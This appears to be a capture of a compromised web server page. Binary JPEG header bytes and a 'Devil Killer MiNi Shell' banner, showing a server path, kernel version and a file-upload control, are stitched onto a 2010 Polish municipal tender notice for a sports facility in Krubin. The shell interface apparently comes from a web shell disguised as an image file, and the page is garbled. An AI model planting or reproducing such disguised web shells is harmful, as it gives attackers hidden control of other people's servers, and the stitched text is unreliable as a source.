JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/72555-N-2010.html

<p class="kh_header"><b>Wieliszew: Budowa obiektów sportowych ze świetlicą środowiskową w Krubinie</b><br>
<b>Numer ogłoszenia: 72555 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wieliszew , ul. Modlińska 1, 05-135 Wieliszew, woj. mazowieckie, tel. 022 7822596, faks 022 7822732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliszew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa obiektów sportowych ze świetlicą środowiskową w Krubinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień: 45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej 
OPIS PRZEDMIOTU ZAMÓWIENIA
1.Przedmiotem zamówienia jest budowa budynku zaplecza sportowego ze świetlicą środowiskową  Krubin  położonego przy ul. Jeziornej na działce 501/5.
Budowę należy realizować zgodnie z  dokumentacją projektową opracowana przez Autorską Pracownię Architektury - Jaszczak Piotr  Łódź
 ul. Piotrkowska 17 oraz  zatwierdzoną przez Starostę Legionowskiego  Decyzją nr 666/09 z dnia 21 sierpnia 2009r.  pismo WA.L.7351-599/09.
Teren inwestycji  zlokalizowany jest w południowej części działki , obszar jest przeznaczony pod zabudowę usługową- teren usług sportu i rekreacji. Na terenie działki nie ma naniesień kubaturowych , zieleń wysoka znajduje się w północnej części działki , działka przylega bezpośrednio do drogi dojazdowej i posiada istniejący utwardzony wjazd.
	Istniejące zagospodarowanie działki stanowią gazociąg wysokiego ciśnienia oraz napowietrzna linia elektryczna średniego napięcia. Projektowany budynek znajduje się  w odległości 8,75m od granicy działki , zorientowany kalenicą równolegle do ul. Jeziornej. W obrębie budynku zaprojektowano 10 miejsc parkingowych oraz ciąg pieszo-jezdny  w północnej części działki.
Zakres zamówienia  obejmuje podłączenia kanalizacyjne , wodne , elektryczne oraz gazowe  bez włączenia do istniejących sieci.
Wejścia główne do budynku zaprojektowano z ciągu pieszo-jezdnego od strony północnej oraz  z ciągu pieszego od ul. Jeziornej , wejścia pomocnicze i ewakuacyjne od strony północnej  , wschodniej i południowej.
Wody opadowe odprowadzone są na teren działki poprzez drenaż i  system rozsączający.
Masy ziemne i inne odpady  wytworzone  podczas budowy będą wywiezione na wysypisko  przez firmę zajmującą się utylizacją gruzu i mas ziemnych pobudowanych.
Przeznaczenie budynku-zaplecze sportowe dla pobliskiego boiska , świetlica środowiskowa , sala widowiskowa z zapleczem kuchennym ,garaż dla dwóch samochodów.
Na parterze budynku zlokalizowano cztery szatnie sportowe , węzły sanitarne , kotłownię oraz garaż z zapleczem , na piętrze zlokalizowano pomieszczenie świetlicy środowiskowej z zapleczem , salę wielofunkcyjną z zapleczem kuchennym , biuro oraz węzły sanitarne.
a/Dane techniczne budynku:
-długość budynku                                 36,63m
-szerokość budynku                              14,68m
-wysokość budynku                              11,58m
-powierzchnia użytkowa                      785,57m2
-powierzchnia całkowita                       969,40m2
-powierzchnia zabudowy                      468,27m2
-kubatura                                              4154,75m3
Projektowany budynek jest dwukondygnacyjny , niepodpiwniczony , murowany z wieńcami i rdzeniem żelbetowym , w kształcie prostokąta  , dach czterospadowy w konstrukcji stalowo-drewnianej , kryty blacho dachówką.
b/Rozwiązania konstrukcyjno-materiałowe
-ławy i stopy fundamentowe żelbetowe z betonu  B20
-ściany fundamentowe z bloczków betonowych  na zaprawie cementowo- wapiennej M5
   ocieplone  warstwą styroduru gr. 10 cm
-ściany oporowe żelbetowe wylewane z betonu B20
- ściany nadziemne  zewnętrzne  i wewnętrzne z pustaka MAX grub. 29 cm , 
  ściany działowe  z pustaka ceramicznego grub. 12 cm na zaprawie 
  cementowo -wapiennej  M3 , ściany zewnętrzne piętra  jako rdzenie żelbetowe
-strop gęsto żebrowy grubości 34cm typu Teriva III
-wieńce monolityczne wylewne z betonu B20
-słupy żelbetowe z betonu B20
-nadproża wylewane na mokro z betonu B20
-podciągi wylewane na mokro z betonu B20
-schody żelbetowe z płyta grubości 15cm
-konstrukcja dachu  elementy wsporcze belka główna , słupki z zastrzałami oraz   
  krokwie koszowe - stalowe , pozostałe elementy krokwie , jętki , kalenica ,  
  murłaty , słupki , miecze drewniane
-konstrukcja daszku nad wejściem na boisko stalowa z rur o przekroju 
  kwadratowym , spawana  
-kominy wentylacyjne z pustaków  wentylacyjnych  Schiedel (otwór    
  wentylacyjny - 17x12cm) obmurowanych  pustakiem ceramicznym 12 cm
-kominy spalinowe murowane z pustaków  wentylacyjnych Schiedel PRO- 
  ADVANCE z systemowym szachem wentylacyjnym  obmurowane cegłą
  ceramiczną pełną
 -izolacje przeciwwilgociowe ścian fundamentowych  masa bitumiczną  
  DEITERMAN SUPERFLEX 10 , w poziomie parteru folią antypoślizgową,
  posadzek na gruncie folia PE ,na stropie folią paroszczelną , izolacje dachu  
  folią DRAFTEX  oraz paraizolacją pod warstwą wełny mineralnej
-izolacje termiczne ścian styropianem grubości 15 cm  i 19 cm  metodą lekko-  
  mokrą , izolacje posadzek na gruncie styropianem grubości do 10 cm,
  izolacje pionowa posadzek na gruncie  STYRODUREM grubości 10cm 
  wpuszczonym w ziemię do głębokości fundamentów , izolacja dachu wełną   
  mineralną grubości 20cm
c/Elementy wykończenia
-posadzki  zmywalne  gres , terakota , wykładziny PCV
-tynki w pomieszczeniach suchych gipsowe , w pomieszczeniach mokrych 
  cementowo-wapienne  , ściany w pomieszczeniach sanitarnych oraz szatniach
-ściany ,malowane farbami akrylowymi
-tynki na sufitach , na parterze gipsowe kat. IV , na piętrze z płyt GK oraz  
  podwieszane typu ARMSTRONG  , w garażach i kotłowni z płyt PROMAT
  PROMATECT
-schody  wykładane płytkami gres
-barierki i pochwyty stalowe fi 50
-stolarka okienna PCV
-drzwi jednoskrzydłowe typ PORTA , dwuskrzydłowe aluminium
-parapety wewnętrzne z konglomeratu
-elewacje  tynki malowane farbami REMMERS
-dach kryty blacho- dachówką w kolorze  ceglastym
-rynny i rury spustowe oraz obróbki z blachy ocynkowanej
-schody zewnętrzne betonowe kryte płytkami gres typ stopnica
-stolarka okienna PCV , okna połaciowe FAKRO
-drzwi zewnętrzne systemowe aluminium 
-parapety z blachy stalowej malowanej brąz
W zakres budowy wchodzi wykonanie instalacji wewnętrznej
 elektrycznej , instalacji centralnego ogrzewania , instalacji wodociągowo - kanalizacyjnej , wentylacji mechanicznej, grawitacyjnej , instalacji gazowej .
2.Szczegółowy zakres robót określają : dokumentacja projektowa , specyfikacja
 techniczna wykonania i odbioru robót  , stanowiące załączniki do SIWZ
 Przedmiary robót stanowiące  załącznik nr 7 są tylko dokumentami 
 pomocniczymi. 
3.Inne postanowienia  dotyczące przedmiotu zamówienia
1)Wykonawca robót jest zobowiązany do wykonania wszelkich prac  
  niezbędnych do wykonania zamówienia a nie wymienionych w dokumentach,
  a podana cena ofertowa zawiera również wartość tych prac.
2)Wykonawca zapewnia pełna obsługę geodezyjną wraz z opracowaniem 
  geodezyjnej inwentaryzacji powykonawczej z niezbędnymi uzgodnieniami
  oraz dokumentacji powykonawczej naniesionej na mapy ewidencji gruntów.
3)Wykonawca w ramach zamówienia  zobowiązany jest do uzyskania  
  ostatecznej   decyzji o pozwoleniu na użytkowanie.
4)Konsekwencje z tytułu przekroczenia wartości umowy poniesie Wykonawca.
5)Warunkiem dokonania odbioru będzie dostarczenie Zamawiającemu  w dniu
  odbioru następujących dokumentów
  -aprobat technicznych (deklaracji zgodności)użytych materiałów,
  -certyfikatów na znak bezpieczeństwa B dla użytych wyrobów,
  -kart gwarancyjnych z warunkami gwarancji,
  -oświadczenia kierownika budowy  , że budowa została wykonana zgodnie
   z projektem i warunkami pozwolenia na budowę , z przepisami  
   i obowiązującymi  Polskimi Normami oraz o doprowadzeniu do należytego
  stanu i porządku terenu budowy  , ulicy , sąsiednich nieruchomości oraz
  obiektu,
6)Z wybranym wykonawcą zostanie zawarta  umowa za cenę ryczałtową 
  obejmująca zakres rzeczowy zamówienia określony w projekcie budowlanym,
  specyfikacji technicznej wykonania i odbioru robót oraz z niniejszej
  specyfikacji istotnych warunków zamówienia.
7)Wykonawca robót ponosi pełna odpowiedzialność za szkody i następstwa 
  nieszczęśliwych wypadków  wynikające z nieprawidłowego wykonania prac 
  lub niewłaściwego oznakowania i zabezpieczenia miejsca wykonania prac.
8)Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez 
  Wykonawcę  jak i  podwykonawcę podczas wykonania przedmiotu  
  zamówienia .
9)Wykonawca przedstawi do zatwierdzenia  przez Zamawiającego    
    harmonogram finansowo-rzeczowy wg następującego  schematu :
   -w  2010 roku zostaną wykonane roboty budowlane za łączną kwotę   brutto
     500 000 PLN,
   -w 2011 roku zostaną  wykonane  roboty budowlane za łączną kwotę brutto
     800 000 PLN,
   -w 2012 roku zostaną wykonane roboty budowlane za  pozostałą do  
     zrealizowania  kwotę .
4.Wymagania materiałowe i jakościowe:
  1)Wszelkie niezbędne materiały zapewnia Wykonawca,
  2)Roboty należy wykonać zgodnie z dokumentacją projektową , specyfikacją
    techniczną wykonania i odbioru robót , pozwoleniem na budowę oraz 
    wymogami  sztuki budowlanej ,
   3)Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów
     gwarantujących najwyższą jakość , dopuszczonych do stosowania w 
     budownictwie,
   4)Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów
      i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie 
     (atesty , certyfikaty , deklaracje zgodności , świadectwa jakości),
   5)Zamawiający dopuszcza składanie ofert z użyciem materiałów i urządzeń 
     równoważnych do wymienionych w SIWZ ,pod warunkiem ,że ich parametry
    będą odpowiadały parametrom techniczno-użytkowym przyje tych  
    materiałów i urządzeń ,
   6)Wykonawca zabezpieczy składowane tymczasowo materiały i urządzenia do
     czasu ich  wbudowania  ich przed zniszczeniem  , uszkodzeniem lub utratą 
     jakości , właściwości lub parametrów oraz udostępni do kontroli przez
     inspektora nadzoru.
5.Wymagania stawiane Wykonawcy:
    1)Wykonawca jest odpowiedzialny za jakość , zgodność z warunkami 
      technicznymi  i jakościowymi  opisanymi  dla przedmiotu zamówienia,
    2)Wymagana jest należyta staranność przy realizacji zobowiązań umowy,
    3)Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą 
       przez  Zamawiającego  z ustanowionym przedstawicielem Wykonawcy,
    4)Wykonawca ma obowiązek znać i stosować w czasie prowadzenia prac 
      przepisy dotyczące ochrony środowiska naturalnego   i bezpieczeństwa 
      ruchu, opłaty i kary za przekroczenie norm poniesie Wykonawca,
    5)Wykonawca jest zobowiązany  posiadać ubezpieczenie odpowiedzialności  
      cywilnej   w zakresie prowadzonej działalności  związanej z przedmiotem 
      zamówienia za szkody oraz następstwa nieszczęśliwych  wypadków,
     6)Wykonawca zobowiązany jest do :
      a)zdobycia wszelkich informacji niezbędnych do prawidłowego 
          przygotowania oferty,
      b)sprawdzenia i zweryfikowania dostarczonych materiałów  oraz 
        niezwłocznego poinformowania Zamawiającego o ewentualnych błędach
        lub przeoczeniach , Zamawiający nie będzie uwzględniał wszelkich    
        roszczeń i uwag z tytułu błędów lub nieścisłości SIWZ  po upływie terminu    
        do wniesienia   odwołania, Wykonawca będzie zobowiązany do wykonania    
        przedmiotu zamówienia  zgodnie z wzorem umowy   stanowiącym     
        załącznik nr 4 do niniejszej    specyfikacji, 
      c)wizyty miejsca realizacji robót i jego otoczenia , w celu oszacowania na  
        własną odpowiedzialność  kosztów i ryzyka robót  oraz uzyskania i 
        zweryfikowania wszelkich danych jakie mogą być niezbędne w  
        przygotowaniu  oferty i podpisaniu umowy na wykonanie przedmiotu
        zamówienia.
  7)Wykonawca , który powołuje się na rozwiązania równoważne  opisane przez  
     Zamawiającego  jest zobowiązany wykazać ,że oferowane przez niego 
     roboty budowlane spełniają wymogi określone przez Zamawiającego.
6.Wspólny Słownik Zamówień (CPV)
    45100000-8 Przygotowanie terenu pod budowę
    45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych 
                         obiektów  budowlanych lub ich części oraz robót w zakresie                  
                         inżynierii lądowej i wodnej
    45215000-7 Roboty budowlane  w zakresie budowy obiektów budowlanych
                         opieki zdrowotnej i społecznej , krematoriów  oraz obiektów 
                         użyteczności publicznej
    45311200-2 Roboty w zakresie instalacji elektrycznych
    45330000-9 Roboty instalacyjne wod-kan i sanitarne
    45400000-1 Roboty wykończeniowe w zakresie obiektów               
                                         Budowlanych

7.Wymagania dotyczące rękojmi i gwarancji:
   Zamawiający żąda minimum 36 -miesięcznego okresu rękojmi za wady oraz
   gwarancji jakości licząc od dnia podpisania protokółu odbioru końcowego  
    robót.
Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>5% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 80 000.00 PLN (słownie:  osiemdziesiąt tysięcy 00/100 PLN)
	Wadium należy wnieść  w terminie do dnia 2010-04-27 do godz. 10:00.
	Wadium może być wnoszone w jednej lub kilku następujących formach:
a:	pieniądzu:
przelewem na rachunek bankowy Zamawiającego: 94 8013 0006 2001 0000 1720 0003;
b:	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c:	gwarancjach bankowych;
d:	gwarancjach ubezpieczeniowych;
e:	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek bedzie oceniany na podstawie dołączonego dokumentu potwierdzajacego posiadanie stosownych uprawnień w sposób: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek bedzie oceniany na podstawie dołączonego wykazu prac o podobnym charakterze wykonanych w okresie ostatnich 5 lat w sposób : spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek bedzie oceniany na podstawie dołączonego wykazu personelu z potwierdzeniem posiadania uprawnień , sposób oceny : spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie oceniany na podstawie informacji z banku , sposób oceny : spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy określa wzór umowy stanowiący załącznik nr 1 do niniejszej Specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
